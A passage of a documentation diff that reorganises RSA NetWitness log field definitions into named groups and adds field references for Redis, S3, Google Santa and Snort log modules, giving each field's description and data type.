-*`rsa.misc.finterface`*:: +*`rsa.identity.org`*:: + -- +This key captures the User organization + type: keyword -- -*`rsa.misc.flags`*:: +*`rsa.identity.dn_dst`*:: + -- +An X.500 (LDAP) Distinguished name that used in a context that indicates a Destination dn + type: keyword -- -*`rsa.misc.gaddr`*:: +*`rsa.identity.firstname`*:: + -- +This key is for First Names only, this is used for Healthcare predominantly to capture Patients information + type: keyword -- -*`rsa.misc.id3`*:: +*`rsa.identity.lastname`*:: + -- +This key is for Last Names only, this is used for Healthcare predominantly to capture Patients information + type: keyword -- -*`rsa.misc.im_buddyname`*:: +*`rsa.identity.user_dept`*:: + -- +User's Department Names only + type: keyword -- -*`rsa.misc.im_croomid`*:: +*`rsa.identity.user_sid_src`*:: + -- +This key captures Source User Session ID + type: keyword -- -*`rsa.misc.im_croomtype`*:: +*`rsa.identity.federated_sp`*:: + -- +This key is the Federated Service Provider. This is the application requesting authentication. + type: keyword -- -*`rsa.misc.im_members`*:: +*`rsa.identity.federated_idp`*:: + -- +This key is the federated Identity Provider. This is the server providing the authentication. + type: keyword -- -*`rsa.misc.im_username`*:: +*`rsa.identity.logon_type_desc`*:: + -- +This key is used to capture the textual description of an integer logon type as stored in the meta key 'logon.type'. + type: keyword -- -*`rsa.misc.ipkt`*:: +*`rsa.identity.middlename`*:: + -- +This key is for Middle Names only, this is used for Healthcare predominantly to capture Patients information + type: keyword -- -*`rsa.misc.ipscat`*:: +*`rsa.identity.password`*:: + -- +This key is for Passwords seen in any session, plain text or encrypted + type: keyword -- -*`rsa.misc.ipspri`*:: +*`rsa.identity.host_role`*:: + -- +This key should only be used to capture the role of a Host Machine + type: keyword -- -*`rsa.misc.latitude`*:: +*`rsa.identity.ldap`*:: + -- +This key is for Uninterpreted LDAP values. Ldap Values that don’t have a clear query or response context + type: keyword -- -*`rsa.misc.linenum`*:: +*`rsa.identity.ldap_query`*:: + -- +This key is the Search criteria from an LDAP search + type: keyword -- -*`rsa.misc.list_name`*:: +*`rsa.identity.ldap_response`*:: + -- +This key is to capture Results from an LDAP search + type: keyword -- -*`rsa.misc.load_data`*:: +*`rsa.identity.owner`*:: + -- +This is used to capture username the process or service is running as, the author of the task + type: keyword -- -*`rsa.misc.location_floor`*:: +*`rsa.identity.service_account`*:: + -- +This key is a windows specific key, used for capturing name of the account a service (referenced in the event) is running under. Legacy Usage + type: keyword -- -*`rsa.misc.location_mark`*:: + +*`rsa.email.email_dst`*:: + -- +This key is used to capture the Destination email address only, when the destination context is not clear use email + type: keyword -- -*`rsa.misc.log_id`*:: +*`rsa.email.email_src`*:: + -- +This key is used to capture the source email address only, when the source context is not clear use email + type: keyword -- -*`rsa.misc.log_type`*:: +*`rsa.email.subject`*:: + -- +This key is used to capture the subject string from an Email only. + type: keyword -- -*`rsa.misc.logid`*:: +*`rsa.email.email`*:: + -- +This key is used to capture a generic email address where the source or destination context is not clear + type: keyword -- -*`rsa.misc.logip`*:: +*`rsa.email.trans_from`*:: + -- +Deprecated key defined only in table map. + type: keyword -- -*`rsa.misc.logname`*:: +*`rsa.email.trans_to`*:: + -- +Deprecated key defined only in table map. + type: keyword -- -*`rsa.misc.longitude`*:: + +*`rsa.file.privilege`*:: + -- +Deprecated, use permissions + type: keyword -- -*`rsa.misc.lport`*:: +*`rsa.file.attachment`*:: + -- +This key captures the attachment file name + type: keyword -- -*`rsa.misc.mbug_data`*:: +*`rsa.file.filesystem`*:: + -- type: keyword -- -*`rsa.misc.misc_name`*:: +*`rsa.file.binary`*:: + -- +Deprecated key defined only in table map. + type: keyword -- -*`rsa.misc.msg_type`*:: +*`rsa.file.filename_dst`*:: + -- +This is used to capture name of the file targeted by the action + type: keyword -- -*`rsa.misc.msgid`*:: +*`rsa.file.filename_src`*:: + -- +This is used to capture name of the parent filename, the file which performed the action + type: keyword -- -*`rsa.misc.netsessid`*:: +*`rsa.file.filename_tmp`*:: + -- type: keyword -- -*`rsa.misc.num`*:: +*`rsa.file.directory_dst`*:: + -- +This key is used to capture the directory of the target process or file + type: keyword -- -*`rsa.misc.number1`*:: +*`rsa.file.directory_src`*:: + -- +This key is used to capture the directory of the source process or file + type: keyword -- -*`rsa.misc.number2`*:: +*`rsa.file.file_entropy`*:: ++ +-- +This is used to capture entropy vale of a file + +type: double + +-- + +*`rsa.file.file_vendor`*:: + -- +This is used to capture Company name of file located in version_info + type: keyword -- -*`rsa.misc.nwwn`*:: +*`rsa.file.task_name`*:: + -- +This is used to capture name of the task + type: keyword -- -*`rsa.misc.object`*:: + +*`rsa.web.fqdn`*:: + -- +Fully Qualified Domain Names + type: keyword -- -*`rsa.misc.operation`*:: +*`rsa.web.web_cookie`*:: + -- +This key is used to capture the Web cookies specifically. + type: keyword -- -*`rsa.misc.opkt`*:: +*`rsa.web.alias_host`*:: + -- type: keyword -- -*`rsa.misc.orig_from`*:: +*`rsa.web.reputation_num`*:: ++ +-- +Reputation Number of an entity. Typically used for Web Domains + +type: double + +-- + +*`rsa.web.web_ref_domain`*:: + -- +Web referer's domain + type: keyword -- -*`rsa.misc.owner_id`*:: +*`rsa.web.web_ref_query`*:: + -- +This key captures Web referer's query portion of the URL + type: keyword -- -*`rsa.misc.p_action`*:: +*`rsa.web.remote_domain`*:: + -- type: keyword -- -*`rsa.misc.p_filter`*:: +*`rsa.web.web_ref_page`*:: + -- +This key captures Web referer's page information + type: keyword -- -*`rsa.misc.p_group_object`*:: +*`rsa.web.web_ref_root`*:: + -- +Web referer's root URL path + type: keyword -- -*`rsa.misc.p_id`*:: +*`rsa.web.cn_asn_dst`*:: + -- type: keyword -- -*`rsa.misc.p_msgid1`*:: +*`rsa.web.cn_rpackets`*:: + -- type: keyword -- -*`rsa.misc.p_msgid2`*:: +*`rsa.web.urlpage`*:: + -- type: keyword -- -*`rsa.misc.p_result1`*:: +*`rsa.web.urlroot`*:: + -- type: keyword -- -*`rsa.misc.password_chg`*:: +*`rsa.web.p_url`*:: + -- type: keyword -- -*`rsa.misc.password_expire`*:: +*`rsa.web.p_user_agent`*:: + -- type: keyword -- -*`rsa.misc.permgranted`*:: +*`rsa.web.p_web_cookie`*:: + -- type: keyword -- -*`rsa.misc.permwanted`*:: +*`rsa.web.p_web_method`*:: + -- type: keyword -- -*`rsa.misc.pgid`*:: +*`rsa.web.p_web_referer`*:: + -- type: keyword -- -*`rsa.misc.policyUUID`*:: +*`rsa.web.web_extension_tmp`*:: + -- type: keyword -- -*`rsa.misc.prog_asp_num`*:: +*`rsa.web.web_page`*:: + -- type: keyword -- -*`rsa.misc.program`*:: + +*`rsa.threat.threat_category`*:: + -- +This key captures Threat Name/Threat Category/Categorization of alert + type: keyword -- -*`rsa.misc.real_data`*:: +*`rsa.threat.threat_desc`*:: + -- +This key is used to capture the threat description from the session directly or inferred + type: keyword -- -*`rsa.misc.rec_asp_device`*:: +*`rsa.threat.alert`*:: + -- +This key is used to capture name of the alert + type: keyword -- -*`rsa.misc.rec_asp_num`*:: +*`rsa.threat.threat_source`*:: + -- +This key is used to capture source of the threat + type: keyword -- -*`rsa.misc.rec_library`*:: + +*`rsa.crypto.crypto`*:: + -- +This key is used to capture the Encryption Type or Encryption Key only + type: keyword -- -*`rsa.misc.recordnum`*:: +*`rsa.crypto.cipher_src`*:: + -- +This key is for Source (Client) Cipher + type: keyword -- -*`rsa.misc.ruid`*:: +*`rsa.crypto.cert_subject`*:: + -- +This key is used to capture the Certificate organization only + type: keyword -- -*`rsa.misc.sburb`*:: +*`rsa.crypto.peer`*:: + -- +This key is for Encryption peer's IP Address + type: keyword -- -*`rsa.misc.sdomain_fld`*:: +*`rsa.crypto.cipher_size_src`*:: ++ +-- +This key captures Source (Client) Cipher Size + +type: long + +-- + +*`rsa.crypto.ike`*:: + -- +IKE negotiation phase. + type: keyword -- -*`rsa.misc.sec`*:: +*`rsa.crypto.scheme`*:: + -- +This key captures the Encryption scheme used + type: keyword -- -*`rsa.misc.sensorname`*:: +*`rsa.crypto.peer_id`*:: + -- +This key is for Encryption peer’s identity + type: keyword -- -*`rsa.misc.seqnum`*:: +*`rsa.crypto.sig_type`*:: + -- +This key captures the Signature Type + type: keyword -- -*`rsa.misc.session`*:: +*`rsa.crypto.cert_issuer`*:: + -- type: keyword -- -*`rsa.misc.sessiontype`*:: +*`rsa.crypto.cert_host_name`*:: + -- +Deprecated key defined only in table map. + type: keyword -- -*`rsa.misc.sigUUID`*:: +*`rsa.crypto.cert_error`*:: + -- +This key captures the Certificate Error String + type: keyword -- -*`rsa.misc.spi`*:: +*`rsa.crypto.cipher_dst`*:: + -- +This key is for Destination (Server) Cipher + type: keyword -- -*`rsa.misc.srcburb`*:: +*`rsa.crypto.cipher_size_dst`*:: ++ +-- +This key captures Destination (Server) Cipher Size + +type: long + +-- + +*`rsa.crypto.ssl_ver_src`*:: + -- +Deprecated, use version + type: keyword -- -*`rsa.misc.srcdom`*:: +*`rsa.crypto.d_certauth`*:: + -- type: keyword -- -*`rsa.misc.srcservice`*:: +*`rsa.crypto.s_certauth`*:: + -- type: keyword -- -*`rsa.misc.state`*:: +*`rsa.crypto.ike_cookie1`*:: + -- +ID of the negotiation — sent for ISAKMP Phase One + type: keyword -- -*`rsa.misc.status1`*:: +*`rsa.crypto.ike_cookie2`*:: + -- +ID of the negotiation — sent for ISAKMP Phase Two + type: keyword -- -*`rsa.misc.svcno`*:: +*`rsa.crypto.cert_checksum`*:: + -- type: keyword -- -*`rsa.misc.system`*:: +*`rsa.crypto.cert_host_cat`*:: + -- +This key is used for the hostname category value of a certificate + type: keyword -- -*`rsa.misc.tbdstr1`*:: +*`rsa.crypto.cert_serial`*:: + -- +This key is used to capture the Certificate serial number only + type: keyword -- -*`rsa.misc.tgtdom`*:: +*`rsa.crypto.cert_status`*:: + -- +This key captures Certificate validation status + type: keyword -- -*`rsa.misc.tgtdomain`*:: +*`rsa.crypto.ssl_ver_dst`*:: + -- +Deprecated, use version + type: keyword -- -*`rsa.misc.threshold`*:: +*`rsa.crypto.cert_keysize`*:: + -- type: keyword -- -*`rsa.misc.type1`*:: +*`rsa.crypto.cert_username`*:: + -- type: keyword -- -*`rsa.misc.udb_class`*:: +*`rsa.crypto.https_insact`*:: + -- type: keyword -- -*`rsa.misc.url_fld`*:: +*`rsa.crypto.https_valid`*:: + -- type: keyword -- -*`rsa.misc.user_div`*:: +*`rsa.crypto.cert_ca`*:: + -- +This key is used to capture the Certificate signing authority only + type: keyword -- -*`rsa.misc.userid`*:: +*`rsa.crypto.cert_common`*:: + -- +This key is used to capture the Certificate common name only + type: keyword -- -*`rsa.misc.username_fld`*:: + +*`rsa.wireless.wlan_ssid`*:: + -- +This key is used to capture the ssid of a Wireless Session + type: keyword -- -*`rsa.misc.utcstamp`*:: +*`rsa.wireless.access_point`*:: + -- +This key is used to capture the access point name. + type: keyword -- -*`rsa.misc.v_instafname`*:: +*`rsa.wireless.wlan_channel`*:: + -- -type: keyword +This is used to capture the channel names + +type: long -- -*`rsa.misc.virt_data`*:: +*`rsa.wireless.wlan_name`*:: + -- +This key captures either WLAN number/name + type: keyword -- -*`rsa.misc.vpnid`*:: + +*`rsa.storage.disk_volume`*:: + -- +A unique name assigned to logical units (volumes) within a physical disk + type: keyword -- -*`rsa.misc.autorun_type`*:: +*`rsa.storage.lun`*:: + -- -This is used to capture Auto Run type +Logical Unit Number.This key is a very useful concept in Storage. type: keyword -- -*`rsa.misc.cc_number`*:: +*`rsa.storage.pwwn`*:: + -- -Valid Credit Card Numbers only +This uniquely identifies a port on a HBA. -type: long +type: keyword -- -*`rsa.misc.content`*:: + +*`rsa.physical.org_dst`*:: + -- -This key captures the content type from protocol headers +This is used to capture the destination organization based on the GEOPIP Maxmind database. type: keyword -- -*`rsa.misc.ein_number`*:: +*`rsa.physical.org_src`*:: + -- -Employee Identification Numbers only +This is used to capture the source organization based on the GEOPIP Maxmind database. -type: long +type: keyword -- -*`rsa.misc.found`*:: + +*`rsa.healthcare.patient_fname`*:: + -- -This is used to capture the results of regex match +This key is for First Names only, this is used for Healthcare predominantly to capture Patients information type: keyword -- -*`rsa.misc.language`*:: +*`rsa.healthcare.patient_id`*:: + -- -This is used to capture list of languages the client support and what it prefers +This key captures the unique ID for a patient type: keyword -- -*`rsa.misc.lifetime`*:: +*`rsa.healthcare.patient_lname`*:: + -- -This key is used to capture the session lifetime in seconds. +This key is for Last Names only, this is used for Healthcare predominantly to capture Patients information -type: long +type: keyword -- -*`rsa.misc.link`*:: +*`rsa.healthcare.patient_mname`*:: + -- -This key is used to link the sessions together. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness +This key is for Middle Names only, this is used for Healthcare predominantly to capture Patients information type: keyword -- -*`rsa.misc.match`*:: + +*`rsa.endpoint.host_state`*:: + -- -This key is for regex match name from search.ini +This key is used to capture the current state of the machine, such as blacklisted, infected, firewall disabled and so on type: keyword -- -*`rsa.misc.param_dst`*:: +*`rsa.endpoint.registry_key`*:: + -- -This key captures the command line/launch argument of the target process or file +This key captures the path to the registry key type: keyword -- -*`rsa.misc.param_src`*:: +*`rsa.endpoint.registry_value`*:: + -- -This key captures source parameter +This key captures values or decorators used within a registry entry type: keyword -- -*`rsa.misc.search_text`*:: +[[exported-fields-redis]] +== Redis fields + +Redis Module + + + +[float] +=== redis + + + + +[float] +=== log + +Redis log files + + + +*`redis.log.role`*:: + -- -This key captures the Search Text used +The role of the Redis instance. Can be one of `master`, `slave`, `child` (for RDF/AOF writing child), or `sentinel`. + type: keyword -- -*`rsa.misc.sig_name`*:: +*`redis.log.pid`*:: + -- -This key is used to capture the Signature Name only. +type: alias -type: keyword +alias to: process.pid -- -*`rsa.misc.snmp_value`*:: +*`redis.log.level`*:: + -- -SNMP set request value +type: alias -type: keyword +alias to: log.level -- -*`rsa.misc.streams`*:: +*`redis.log.message`*:: + -- -This key captures number of streams in session +type: alias -type: long +alias to: message -- +[float] +=== slowlog + +Slow logs are retrieved from Redis via a network connection. + -*`rsa.db.index`*:: + +*`redis.slowlog.cmd`*:: + -- -This key captures IndexID of the index. +The command executed. + type: keyword -- -*`rsa.db.instance`*:: +*`redis.slowlog.duration.us`*:: + -- -This key is used to capture the database server instance name +How long it took to execute the command in microseconds. -type: keyword + +type: long -- -*`rsa.db.database`*:: +*`redis.slowlog.id`*:: + -- -This key is used to capture the name of a database or an instance as seen in a session +The ID of the query. -type: keyword + +type: long -- -*`rsa.db.transact_id`*:: +*`redis.slowlog.key`*:: + -- -This key captures the SQL transantion ID of the current session +The key on which the command was executed. + type: keyword -- -*`rsa.db.permissions`*:: +*`redis.slowlog.args`*:: + -- -This key captures permission or privilege level assigned to a resource. +The arguments with which the command was called. + type: keyword -- -*`rsa.db.table_name`*:: +[[exported-fields-s3]] +== s3 fields + +S3 fields from s3 input. + + + +*`bucket_name`*:: + -- -This key is used to capture the table name +Name of the S3 bucket that this log retrieved from. + type: keyword -- -*`rsa.db.db_id`*:: +*`object_key`*:: + -- -This key is used to capture the unique identifier for a database +Name of the S3 object that this log retrieved from. + type: keyword -- -*`rsa.db.db_pid`*:: +[[exported-fields-santa]] +== Google Santa fields + +Santa Module + + + +[float] +=== santa + + + + +*`santa.action`*:: + -- -This key captures the process id of a connection with database server +Action -type: long +type: keyword + +example: EXEC -- -*`rsa.db.lread`*:: +*`santa.decision`*:: + -- -This key is used for the number of logical reads +Decision that santad took. -type: long +type: keyword + +example: ALLOW -- -*`rsa.db.lwrite`*:: +*`santa.reason`*:: + -- -This key is used for the number of logical writes +Reason for the decsision. -type: long +type: keyword + +example: CERT -- -*`rsa.db.pread`*:: +*`santa.mode`*:: + -- -This key is used for the number of physical writes +Operating mode of Santa. -type: long +type: keyword + +example: M -- +[float] +=== disk + +Fields for DISKAPPEAR actions. -*`rsa.network.alias_host`*:: + +*`santa.disk.volume`*:: + -- -This key should be used when the source or destination context of a hostname is not clear.Also it captures the Device Hostname. Any Hostname that isnt ad.computer. - -type: keyword +The volume name. -- -*`rsa.network.domain`*:: +*`santa.disk.bus`*:: + -- -type: keyword +The disk bus protocol. -- -*`rsa.network.host_dst`*:: +*`santa.disk.serial`*:: + -- -This key should only be used when it’s a Destination Hostname - -type: keyword +The disk serial number. -- -*`rsa.network.network_service`*:: +*`santa.disk.bsdname`*:: + -- -This is used to capture layer 7 protocols/service names +The disk BSD name. -type: keyword +example: disk1s3 -- -*`rsa.network.interface`*:: +*`santa.disk.model`*:: + -- -This key should be used when the source or destination context of an interface is not clear +The disk model. -type: keyword +example: APPLE SSD SM0512L -- -*`rsa.network.network_port`*:: +*`santa.disk.fs`*:: + -- -Deprecated, use port. NOTE: There is a type discrepancy as currently used, TM: Int32, INDEX: UInt64 (why neither chose the correct UInt16?!) +The disk volume kind (filesystem type). -type: long +example: apfs -- -*`rsa.network.eth_host`*:: +*`santa.disk.mount`*:: + -- -Deprecated, use alias.mac - -type: keyword +The disk volume path. -- -*`rsa.network.sinterface`*:: +*`santa.certificate.common_name`*:: + -- -This key should only be used when it’s a Source Interface +Common name from code signing certificate. type: keyword -- -*`rsa.network.dinterface`*:: +*`santa.certificate.sha256`*:: + -- -This key should only be used when it’s a Destination Interface +SHA256 hash of code signing certificate. type: keyword -- -*`rsa.network.vlan`*:: -+ --- -This key should only be used to capture the ID of the Virtual LAN +[[exported-fields-snort]] +== Snort/Sourcefire fields -type: long +snort fields. --- -*`rsa.network.zone_src`*:: + +*`network.interface.name`*:: + -- -This key should only be used when it’s a Source Zone. +Name of the network interface where the traffic has been observed. + type: keyword -- -*`rsa.network.zone`*:: + + +*`rsa.internal.msg`*:: + -- -This key should be used when the source or destination context of a Zone is not clear +This key is used to capture the raw message that comes into the Log Decoder type: keyword -- -*`rsa.network.zone_dst`*:: +*`rsa.internal.messageid`*:: + -- -This key should only be used when it’s a Destination Zone. - type: keyword -- -*`rsa.network.gateway`*:: +*`rsa.internal.event_desc`*:: + -- -This key is used to capture the IP Address of the gateway - type: keyword -- -*`rsa.network.icmp_type`*:: +*`rsa.internal.message`*:: + -- -This key is used to capture the ICMP type only +This key captures the contents of instant messages -type: long +type: keyword -- -*`rsa.network.mask`*:: +*`rsa.internal.time`*:: + -- -This key is used to capture the device network IPmask. +This is the time at which a session hits a NetWitness Decoder. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness. -type: keyword +type: date -- -*`rsa.network.icmp_code`*:: +*`rsa.internal.level`*:: + -- -This key is used to capture the ICMP code only +Deprecated key defined only in table map. type: long -- -*`rsa.network.protocol_detail`*:: +*`rsa.internal.msg_id`*:: + -- -This key should be used to capture additional protocol information +This is the Message ID1 value that identifies the exact log parser definition which parses a particular log session. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness type: keyword -- -*`rsa.network.dmask`*:: +*`rsa.internal.msg_vid`*:: + -- -This key is used for Destionation Device network mask +This is the Message ID2 value that identifies the exact log parser definition which parses a particular log session. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness type: keyword -- -*`rsa.network.port`*:: +*`rsa.internal.data`*:: + -- -This key should only be used to capture a Network Port when the directionality is not clear +Deprecated key defined only in table map. -type: long +type: keyword -- -*`rsa.network.smask`*:: +*`rsa.internal.obj_server`*:: + -- -This key is used for capturing source Network Mask +Deprecated key defined only in table map. type: keyword -- -*`rsa.network.netname`*:: +*`rsa.internal.obj_val`*:: + -- -This key is used to capture the network name associated with an IP range. This is configured by the end user. +Deprecated key defined only in table map. type: keyword -- -*`rsa.network.paddr`*:: +*`rsa.internal.resource`*:: + -- -Deprecated +Deprecated key defined only in table map. -type: ip +type: keyword -- -*`rsa.network.faddr`*:: +*`rsa.internal.obj_id`*:: + -- +Deprecated key defined only in table map. + type: keyword -- -*`rsa.network.lhost`*:: +*`rsa.internal.statement`*:: + -- +Deprecated key defined only in table map. + type: keyword -- -*`rsa.network.origin`*:: +*`rsa.internal.audit_class`*:: + -- +Deprecated key defined only in table map. + type: keyword -- -*`rsa.network.remote_domain_id`*:: +*`rsa.internal.entry`*:: + -- +Deprecated key defined only in table map. + type: keyword -- -*`rsa.network.addr`*:: +*`rsa.internal.hcode`*:: + -- +Deprecated key defined only in table map. + type: keyword -- -*`rsa.network.dns_a_record`*:: +*`rsa.internal.inode`*:: + -- -type: keyword +Deprecated key defined only in table map. + +type: long -- -*`rsa.network.dns_ptr_record`*:: +*`rsa.internal.resource_class`*:: + -- +Deprecated key defined only in table map. + type: keyword -- -*`rsa.network.fhost`*:: +*`rsa.internal.dead`*:: + -- -type: keyword +Deprecated key defined only in table map. + +type: long -- -*`rsa.network.fport`*:: +*`rsa.internal.feed_desc`*:: + -- +This is used to capture the description of the feed. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness + type: keyword -- -*`rsa.network.laddr`*:: +*`rsa.internal.feed_name`*:: + -- +This is used to capture the name of the feed. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness + type: keyword -- -*`rsa.network.linterface`*:: +*`rsa.internal.cid`*:: + -- +This is the unique identifier used to identify a NetWitness Concentrator. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness + type: keyword -- -*`rsa.network.phost`*:: +*`rsa.internal.device_class`*:: + -- +This is the Classification of the Log Event Source under a predefined fixed set of Event Source Classifications. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness + type: keyword -- -*`rsa.network.ad_computer_dst`*:: +*`rsa.internal.device_group`*:: + -- -Deprecated, use host.dst +This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness type: keyword -- -*`rsa.network.eth_type`*:: +*`rsa.internal.device_host`*:: + -- -This key is used to capture Ethernet Type, Used for Layer 3 Protocols Only +This is the Hostname of the log Event Source sending the logs to NetWitness. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness -type: long +type: keyword -- -*`rsa.network.ip_proto`*:: +*`rsa.internal.device_ip`*:: + -- -This key should be used to capture the Protocol number, all the protocol nubers are converted into string in UI +This is the IPv4 address of the Log Event Source sending the logs to NetWitness. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness -type: long +type: ip -- -*`rsa.network.dns_cname_record`*:: +*`rsa.internal.device_ipv6`*:: + -- -type: keyword +This is the IPv6 address of the Log Event Source sending the logs to NetWitness. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness + +type: ip -- -*`rsa.network.dns_id`*:: +*`rsa.internal.device_type`*:: + -- +This is the name of the log parser which parsed a given session. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness + type: keyword -- -*`rsa.network.dns_opcode`*:: +*`rsa.internal.device_type_id`*:: + -- -type: keyword +Deprecated key defined only in table map. + +type: long -- -*`rsa.network.dns_resp`*:: +*`rsa.internal.did`*:: + -- +This is the unique identifier used to identify a NetWitness Decoder. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness + type: keyword -- -*`rsa.network.dns_type`*:: +*`rsa.internal.entropy_req`*:: + -- -type: keyword +This key is only used by the Entropy Parser, the Meta Type can be either UInt16 or Float32 based on the configuration + +type: long -- -*`rsa.network.domain1`*:: +*`rsa.internal.entropy_res`*:: + -- -type: keyword +This key is only used by the Entropy Parser, the Meta Type can be either UInt16 or Float32 based on the configuration + +type: long -- -*`rsa.network.host_type`*:: +*`rsa.internal.event_name`*:: + -- +Deprecated key defined only in table map. + type: keyword -- -*`rsa.network.packet_length`*:: +*`rsa.internal.feed_category`*:: + -- +This is used to capture the category of the feed. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness + type: keyword -- -*`rsa.network.host_orig`*:: +*`rsa.internal.forward_ip`*:: + -- -This is used to capture the original hostname in case of a Forwarding Agent or a Proxy in between. +This key should be used to capture the IPV4 address of a relay system which forwarded the events from the original system to NetWitness. -type: keyword +type: ip -- -*`rsa.network.rpayload`*:: +*`rsa.internal.forward_ipv6`*:: + -- -This key is used to capture the total number of payload bytes seen in the retransmitted packets. +This key is used to capture the IPV6 address of a relay system which forwarded the events from the original system to NetWitness. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness -type: keyword +type: ip -- -*`rsa.network.vlan_name`*:: +*`rsa.internal.header_id`*:: + -- -This key should only be used to capture the name of the Virtual LAN +This is the Header ID value that identifies the exact log parser header definition that parses a particular log session. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness type: keyword -- - -*`rsa.investigations.ec_activity`*:: +*`rsa.internal.lc_cid`*:: + -- -This key captures the particular event activity(Ex:Logoff) +This is a unique Identifier of a Log Collector. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness type: keyword -- -*`rsa.investigations.ec_theme`*:: +*`rsa.internal.lc_ctime`*:: + -- -This key captures the Theme of a particular Event(Ex:Authentication) +This is the time at which a log is collected in a NetWitness Log Collector. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness -type: keyword +type: date -- -*`rsa.investigations.ec_subject`*:: +*`rsa.internal.mcb_req`*:: + -- -This key captures the Subject of a particular Event(Ex:User) +This key is only used by the Entropy Parser, the most common byte request is simply which byte for each side (0 thru 255) was seen the most -type: keyword +type: long -- -*`rsa.investigations.ec_outcome`*:: +*`rsa.internal.mcb_res`*:: + -- -This key captures the outcome of a particular Event(Ex:Success) +This key is only used by the Entropy Parser, the most common byte response is simply which byte for each side (0 thru 255) was seen the most -type: keyword +type: long -- -*`rsa.investigations.event_cat`*:: +*`rsa.internal.mcbc_req`*:: + -- -This key captures the Event category number +This key is only used by the Entropy Parser, the most common byte count is the number of times the most common byte (above) was seen in the session streams type: long -- -*`rsa.investigations.event_cat_name`*:: +*`rsa.internal.mcbc_res`*:: + -- -This key captures the event category name corresponding to the event cat code +This key is only used by the Entropy Parser, the most common byte count is the number of times the most common byte (above) was seen in the session streams -type: keyword +type: long -- -*`rsa.investigations.event_vcat`*:: +*`rsa.internal.medium`*:: + -- -This is a vendor supplied category. This should be used in situations where the vendor has adopted their own event_category taxonomy. +This key is used to identify if it’s a log/packet session or Layer 2 Encapsulation Type. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness. 32 = log, 33 = correlation session, < 32 is packet session -type: keyword +type: long -- -*`rsa.investigations.analysis_file`*:: +*`rsa.internal.node_name`*:: + -- -This is used to capture all indicators used in a File Analysis. This key should be used to capture an analysis of a file +Deprecated key defined only in table map. type: keyword -- -*`rsa.investigations.analysis_service`*:: +*`rsa.internal.nwe_callback_id`*:: + -- -This is used to capture all indicators used in a Service Analysis. This key should be used to capture an analysis of a service +This key denotes that event is endpoint related type: keyword -- -*`rsa.investigations.analysis_session`*:: +*`rsa.internal.parse_error`*:: + -- -This is used to capture all indicators used for a Session Analysis. This key should be used to capture an analysis of a session +This is a special key that stores any Meta key validation error found while parsing a log session. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness type: keyword -- -*`rsa.investigations.boc`*:: +*`rsa.internal.payload_req`*:: + -- -This is used to capture behaviour of compromise +This key is only used by the Entropy Parser, the payload size metrics are the payload sizes of each session side at the time of parsing. However, in order to keep -type: keyword +type: long -- -*`rsa.investigations.eoc`*:: +*`rsa.internal.payload_res`*:: + -- -This is used to capture Enablers of Compromise +This key is only used by the Entropy Parser, the payload size metrics are the payload sizes of each session side at the time of parsing. However, in order to keep -type: keyword +type: long -- -*`rsa.investigations.inv_category`*:: +*`rsa.internal.process_vid_dst`*:: + -- -This used to capture investigation category +Endpoint generates and uses a unique virtual ID to identify any similar group of process. This ID represents the target process. type: keyword -- -*`rsa.investigations.inv_context`*:: +*`rsa.internal.process_vid_src`*:: + -- -This used to capture investigation context +Endpoint generates and uses a unique virtual ID to identify any similar group of process. This ID represents the source process. type: keyword -- -*`rsa.investigations.ioc`*:: +*`rsa.internal.rid`*:: + -- -This is key capture indicator of compromise +This is a special ID of the Remote Session created by NetWitness Decoder. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness -type: keyword +type: long -- - -*`rsa.counters.dclass_c1`*:: +*`rsa.internal.session_split`*:: + -- -This is a generic counter key that should be used with the label dclass.c1.str only +This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness -type: long +type: keyword -- -*`rsa.counters.dclass_c2`*:: +*`rsa.internal.site`*:: + -- -This is a generic counter key that should be used with the label dclass.c2.str only +Deprecated key defined only in table map. -type: long +type: keyword -- -*`rsa.counters.event_counter`*:: +*`rsa.internal.size`*:: + -- -This is used to capture the number of times an event repeated +This is the size of the session as seen by the NetWitness Decoder. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness type: long -- -*`rsa.counters.dclass_r1`*:: +*`rsa.internal.sourcefile`*:: + -- -This is a generic ratio key that should be used with the label dclass.r1.str only +This is the name of the log file or PCAPs that can be imported into NetWitness. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness type: keyword -- -*`rsa.counters.dclass_c3`*:: +*`rsa.internal.ubc_req`*:: + -- -This is a generic counter key that should be used with the label dclass.c3.str only +This key is only used by the Entropy Parser, Unique byte count is the number of unique bytes seen in each stream. 256 would mean all byte values of 0 thru 255 were seen at least once type: long -- -*`rsa.counters.dclass_c1_str`*:: +*`rsa.internal.ubc_res`*:: + -- -This is a generic counter string key that should be used with the label dclass.c1 only +This key is only used by the Entropy Parser, Unique byte count is the number of unique bytes seen in each stream. 256 would mean all byte values of 0 thru 255 were 